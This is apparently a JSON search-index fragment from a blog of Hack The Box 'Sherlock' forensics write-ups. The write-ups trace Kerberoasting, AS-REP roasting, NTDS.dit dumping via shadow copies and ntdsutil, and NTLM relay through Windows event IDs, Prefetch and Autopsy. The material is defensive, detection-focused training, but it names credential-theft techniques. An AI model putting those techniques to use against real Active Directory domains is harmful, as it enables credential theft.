Address:\nClient Address: 172.17.79.129\nQ4: Script Enumeration for Kerberoastable Accounts Now that we have the workstation, review the provided PowerShell logs and Prefetch files to understand how this activity occurred. We’re looking for the file used to enumerate Active Directory objects and find Kerberoastable accounts.\nSearch using Event ID 4104.\nQ5: Script Execution Time When was this script executed?\nRefer again to Event ID 4104, and convert the timestamp to UTC.\n🕒 Execution Time (UTC): 2024-05-21 03:16:32\nQ6: Kerberoasting Tool Path Determine the full path of the tool used to perform the actual Kerberoasting attack.\nUse PECmd for Prefetch analysis.\nThen, open the exported timeline .csv using Timeline Explorer.\nQ7: Tool Execution Time When was the tool executed to dump credentials?\nYou can find this information in the previous screenshot (Prefetch timeline CSV output).\n","permalink":"https://mikehorn-git.github.io/writeups/htb/sherlocks/campfire-1/","summary":"\u003ch1 id=\"q1-analyzing-domain-controller-security-logs\"\u003eQ1: Analyzing Domain Controller Security Logs\u003c/h1\u003e\n\u003cp\u003eCan you confirm the \u003cstrong\u003edate and time\u003c/strong\u003e when the \u003cem\u003eKerberoasting\u003c/em\u003e activity occurred?\u003c/p\u003e\n\u003cp\u003eOpen \u003cstrong\u003eEvent Viewer\u003c/strong\u003e on the Windows VM and search for \u003cstrong\u003eEvent ID \u003ca href=\"https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4769\"\u003e4769\u003c/a\u003e\u003c/strong\u003e.\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp\u003e🕒 Remember to convert your local time to \u003cstrong\u003eUTC\u003c/strong\u003e.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e\u003cimg alt=\"Kerberoasting Event\" loading=\"lazy\" src=\"/writeups/htb/sherlocks/campfire-1/2024-09-21T16_52_20,152679715+02_00.png\"\u003e\u003c/p\u003e\n\u003chr\u003e\n\u003ch1 id=\"q2-targeted-service-name\"\u003eQ2: Targeted Service Name\u003c/h1\u003e\n\u003cp\u003eWhat is the \u003cstrong\u003eService Name\u003c/strong\u003e that was targeted?\u003c/p\u003e\n\u003cp\u003eCheck the \u0026ldquo;Service Information\u0026rdquo; section of the same event:\u003c/p\u003e\n\u003cp\u003e\u003cimg alt=\"Service Name\" loading=\"lazy\" src=\"/writeups/htb/sherlocks/campfire-1/2024-09-21T16_58_06,480108177+02_00.png\"\u003e\u003c/p\u003e\n\u003chr\u003e\n\u003ch1 id=\"q3-workstation-identification\"\u003eQ3: Workstation Identification\u003c/h1\u003e\n\u003cp\u003eIdentify the \u003cstrong\u003eWorkstation IP Address\u003c/strong\u003e from which the activity originated.\u003c/p\u003e","title":"campfire-1"},{"content":"Q1: When did the AS-REP Roasting attack occur, and when did the attacker request the Kerberos ticket for the vulnerable user? Open Event Viewer on the Windows VM and search for Event ID 4768.\nLook for anomalies in the logs — specifically events where:\nPre-Authentication Type: 0\nThis indicates that the account does not require Kerberos pre-authentication, making it vulnerable to AS-REP Roasting.\n🕒 Remember to convert the timestamp to UTC when documenting your findings.\nQ2: Please confirm the User Account that was targeted by the attacker. Within the same Event ID 4768, navigate to:\nAccount Information → Account Name\nThis field identifies the vulnerable account targeted during the attack.\nQ3: What was the SID of the targeted account? Again, in the same event:\nAccount Information → User ID\nThis value provides the unique Security Identifier (SID) of the compromised account.\nQ4: Identify the internal IP address of the compromised workstation used in this attack. In the same event, check:\nNetwork Information → Client Address\nThis reveals the source system that initiated the AS-REP request.\nQ5: Using the same Domain Controller security logs, determine which user account performed the AS-REP Roasting attack. Search for Event ID 4769, which logs Kerberos service ticket requests.\nCorrelate this event with the earlier 4768 event to identify the attacker-controlled account.\n🔍 The Account Name in this event indicates the user account used to request service tickets after identifying the vulnerable account.\n","permalink":"https://mikehorn-git.github.io/writeups/htb/sherlocks/campfire-2/","summary":"\u003ch1 id=\"q1-when-did-the-as-rep-roasting-attack-occur-and-when-did-the-attacker-request-the-kerberos-ticket-for-the-vulnerable-user\"\u003eQ1: When did the \u003cem\u003eAS-REP Roasting\u003c/em\u003e attack occur, and when did the attacker request the Kerberos ticket for the vulnerable user?\u003c/h1\u003e\n\u003cp\u003eOpen \u003cstrong\u003eEvent Viewer\u003c/strong\u003e on the Windows VM and search for \u003cstrong\u003eEvent ID \u003ca href=\"https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4768\"\u003e4768\u003c/a\u003e\u003c/strong\u003e.\u003c/p\u003e\n\u003cp\u003eLook for anomalies in the logs — specifically events where:\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp\u003e\u003cstrong\u003ePre-Authentication Type:\u003c/strong\u003e \u003ccode\u003e0\u003c/code\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003eThis indicates that the account does not require Kerberos pre-authentication, making it vulnerable to \u003cem\u003eAS-REP Roasting\u003c/em\u003e.\u003c/p\u003e\n\u003cp\u003e\u003cimg alt=\"ASREP Event\" loading=\"lazy\" src=\"/writeups/htb/sherlocks/campfire-2/2024-09-21T18:18:55,910252335+02:00.png\"\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp\u003e🕒 Remember to convert the timestamp to \u003cstrong\u003eUTC\u003c/strong\u003e when documenting your findings.\u003c/p\u003e","title":"campfire-2"},{"content":"Q1: Attackers can abuse the vssadmin utility to create volume shadow snapshots and then extract sensitive files like NTDS.dit to bypass security mechanisms. Identify the time when the Volume Shadow Copy service entered a running state. Open the SYSTEM.evtx log and search for Event ID 7036.\nLook for events indicating the Volume Shadow Copy service entering a running state:\n🕒 Convert the timestamp to UTC.\nQ2: When a volume shadow snapshot is created, the Volume shadow copy service validates the privileges using the Machine account and enumerates User groups. Find the User groups it enumerates, the Subject Account name, and also identify the Process ID(in decimal) of the Volume shadow copy service process Search for Event ID 4799 and filter for:\nProcess Name: VSSVC.exe\nFrom this event, identify:\nUser Groups Subject Account Name Process ID (convert to decimal if needed) Q3: Identify the Process ID (in Decimal) of the volume shadow copy service process. From the previous Event ID 4799:\nProcess ID: (convert from hexadecimal to decimal)\nExample:\n0x1190 → (convert to decimal)\nQ4: Find the assigned Volume ID/GUID value to the Shadow copy snapshot when it was mounted. Search for Event ID 300 in NTFS logs:\nQ5: Identify the full path of the dumped NTDS database on disk. Use a forensic tool such as Autopsy and search for:\nntds.dit\nQ6: When was newly dumped ntds.dit created on disk? From the previous result in Autopsy, check:\nCreated On field\nQ7: A registry hive was also dumped alongside the NTDS database. Which registry hive was dumped and what is its file size in bytes? Navigate to the same directory as ntds.dit.\nYou should find the SYSTEM hive. In Autopsy, check the Overview tab:\n","permalink":"https://mikehorn-git.github.io/writeups/htb/sherlocks/crownjewel-1/","summary":"\u003ch1 id=\"q1-attackers-can-abuse-the-vssadmin-utility-to-create-volume-shadow-snapshots-and-then-extract-sensitive-files-like-ntdsdit-to-bypass-security-mechanisms-identify-the-time-when-the-volume-shadow-copy-service-entered-a-running-state\"\u003eQ1: Attackers can abuse the vssadmin utility to create volume shadow snapshots and then extract sensitive files like NTDS.dit to bypass security mechanisms. Identify the time when the Volume Shadow Copy service entered a running state.\u003c/h1\u003e\n\u003cp\u003eOpen the \u003cstrong\u003eSYSTEM.evtx\u003c/strong\u003e log and search for \u003cstrong\u003eEvent ID 7036\u003c/strong\u003e.\u003c/p\u003e\n\u003cp\u003eLook for events indicating the \u003cstrong\u003eVolume Shadow Copy\u003c/strong\u003e service entering a running state:\u003c/p\u003e\n\u003cp\u003e\u003cimg alt=\"7036\" loading=\"lazy\" src=\"/writeups/htb/sherlocks/crownjewel-1/2024-09-21T11_58_52,679703907+02_00.png\"\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp\u003e🕒 Convert the timestamp to \u003cstrong\u003eUTC\u003c/strong\u003e.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003chr\u003e\n\u003ch1 id=\"q2-when-a-volume-shadow-snapshot-is-created-the-volume-shadow-copy-service-validates-the-privileges-using-the-machine-account-and-enumerates-user-groups-find-the-user-groups-it-enumerates-the-subject-account-name-and-also-identify-the-process-idin-decimal-of-the-volume-shadow-copy-service-process\"\u003eQ2: When a volume shadow snapshot is created, the Volume shadow copy service validates the privileges using the Machine account and enumerates User groups. Find the User groups it enumerates, the Subject Account name, and also identify the Process ID(in decimal) of the Volume shadow copy service process\u003c/h1\u003e\n\u003cp\u003eSearch for \u003cstrong\u003eEvent ID \u003ca href=\"https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4799\"\u003e4799\u003c/a\u003e\u003c/strong\u003e and filter for:\u003c/p\u003e","title":"crownjewel-1"},{"content":"Q1: When utilizing ntdsutil.exe to dump NTDS on disk, it simultaneously employs the Microsoft Shadow Copy Service. What is the most recent timestamp at which this service entered the running state, signifying the possible initiation of the NTDS dumping process? Open the SYSTEM.evtx log and search for Event ID 7036.\nUse a search (Ctrl+F) for Volume Shadow Copy service events.\nIdentify the most recent entry where the service entered the running state and note the timestamp from the:\nLogged field\n🕒 Convert the timestamp to UTC.\nQ2: Identify the full path of the dumped NTDS file. Search for ESENT-related events, which are tied to database operations.\nUse Event ID 325, which indicates:\n\u0026ldquo;The database engine created a new database\u0026rdquo;\nThis event includes the full file path of the dumped database.\nQ3: When was the database dump created on the disk? From the same Event ID 325, retrieve the timestamp from the:\nLogged field\nThis indicates when the database dump was created.\nQ4: When was the newly dumped database considered complete and ready for use? Search for Event ID 327, which indicates:\n\u0026ldquo;The database engine detached a database\u0026rdquo;\nThis marks when the dump process completed and the database was ready for use.\nQ5: Event logs use event sources to track events coming from different sources. Which event source provides database status data like creation and detachment? Check the Source field in the relevant events.\nEvent Source: ESENT\nThis source is responsible for logging database creation, usage, and detachment events.\nQ6: When ntdsutil.exe is used to dump the database, it enumerates certain user groups to validate the privileges of the account being used. Which two groups are enumerated by the ntdsutil.exe process? Also, find the Logon ID so we can easily track the malicious session in our hunt. Search for Event ID 4799 and filter for:\nProcess Name: ntdsutil.exe\nFrom this event, identify:\nThe two enumerated user groups The Logon ID Q7: Now you are tasked to find the Login Time for the malicious Session. Using the Logon ID, find the Time when the user logon session started. Search for Event ID 5379.\nUsing the Logon ID identified in the previous step, correlate the event and extract the timestamp from the:\nLogged field\nThis represents the start time of the malicious logon session.\n","permalink":"https://mikehorn-git.github.io/writeups/htb/sherlocks/crownjewel-2/","summary":"\u003ch1 id=\"q1-when-utilizing-ntdsutilexe-to-dump-ntds-on-disk-it-simultaneously-employs-the-microsoft-shadow-copy-service-what-is-the-most-recent-timestamp-at-which-this-service-entered-the-running-state-signifying-the-possible-initiation-of-the-ntds-dumping-process\"\u003eQ1: When utilizing ntdsutil.exe to dump NTDS on disk, it simultaneously employs the Microsoft Shadow Copy Service. What is the most recent timestamp at which this service entered the running state, signifying the possible initiation of the NTDS dumping process?\u003c/h1\u003e\n\u003cp\u003eOpen the \u003cstrong\u003eSYSTEM.evtx\u003c/strong\u003e log and search for \u003cstrong\u003eEvent ID 7036\u003c/strong\u003e.\u003c/p\u003e\n\u003cp\u003eUse a search (Ctrl+F) for \u003cstrong\u003eVolume Shadow Copy\u003c/strong\u003e service events.\u003c/p\u003e\n\u003cp\u003eIdentify the most recent entry where the service entered the running state and note the timestamp from the:\u003c/p\u003e","title":"crownjewel-2"},{"content":"Q1: IP Address of Forela-Wkstn001 What is the IP address of Forela-Wkstn001?\n🔎 See Q2 for the analysis steps.\nQ2: IP Address of Forela-Wkstn002 What is the IP address of Forela-Wkstn002?\nNote: NetworkMiner requires .pcap format. Convert the file if needed:\ntshark -F pcap -r ntlmrelay.pcapng -w ntlmrelay.pcap Open the capture in NetworkMiner to get an overview of network activity. Both workstation IP addresses can be identified here:\nQ3: Compromised User Account Which user account hash was stolen by the attacker?\n🔎 See Q4 for details.\nQ4: Attacker Device IP Address What is the IP address of the unknown device used by the attacker to intercept credentials?\nNavigate to the Credentials tab in NetworkMiner to identify:\nThe compromised user account The attacker’s IP address Q5: Accessed Fileshare What fileshare was accessed by the victim user account?\nSwitch to the Parameters tab and filter for SMB2 requests. Only one directory was accessed:\nQ6: Source Port Used What is the source port used to log on to the target workstation using the compromised account?\n🔎 See Q7 for details.\nQ7: Malicious Session Logon ID What is the Logon ID for the malicious session?\nOpen security.evtx and inspect Event ID 5140 (network share object).\nFrom this event:\nExtract the Logon ID (in hexadecimal) Identify the source port (used for Q6) Q8: Suspicious Logon Details The detection is based on a mismatch between hostname and assigned IP address. What are:\nThe workstation name? The source IP address used during the malicious logon? 🔎 See Q9 for details.\nQ9: Malicious Logon Timestamp When did the malicious logon occur? Ensure the timestamp is in UTC.\nCheck Event ID 4624 (logon event).\nKey indicators:\nLogon ID 0x0 Security ID NULL Associated user: arthur kyle This event provides:\nTimestamp (convert to UTC) Workstation name Source IP address Q10: Accessed Share Name What is the share name accessed during authentication by the malicious tool?\nRefer back to Event ID 5140 (see Q6/Q7) to identify the share name.\n","permalink":"https://mikehorn-git.github.io/writeups/htb/sherlocks/reaper/","summary":"\u003ch1 id=\"q1-ip-address-of-forela-wkstn001\"\u003eQ1: IP Address of Forela-Wkstn001\u003c/h1\u003e\n\u003cp\u003eWhat is the IP address of \u003cstrong\u003eForela-Wkstn001\u003c/strong\u003e?\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp\u003e🔎 See Q2 for the analysis steps.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003chr\u003e\n\u003ch1 id=\"q2-ip-address-of-forela-wkstn002\"\u003eQ2: IP Address of Forela-Wkstn002\u003c/h1\u003e\n\u003cp\u003eWhat is the IP address of \u003cstrong\u003eForela-Wkstn002\u003c/strong\u003e?\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eNote:\u003c/strong\u003e NetworkMiner requires \u003ccode\u003e.pcap\u003c/code\u003e format. Convert the file if needed:\u003c/p\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003etshark -F pcap -r ntlmrelay.pcapng -w ntlmrelay.pcap\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003cp\u003eOpen the capture in \u003cstrong\u003eNetworkMiner\u003c/strong\u003e to get an overview of network activity.\nBoth workstation IP addresses can be identified here:\u003c/p\u003e\n\u003cp\u003e\u003cimg alt=\"NetworkMiner Overview\" loading=\"lazy\" src=\"/writeups/htb/sherlocks/reaper/2024-09-21T15_32_55,042790459+02_00.png\"\u003e\u003c/p\u003e","title":"reaper"}]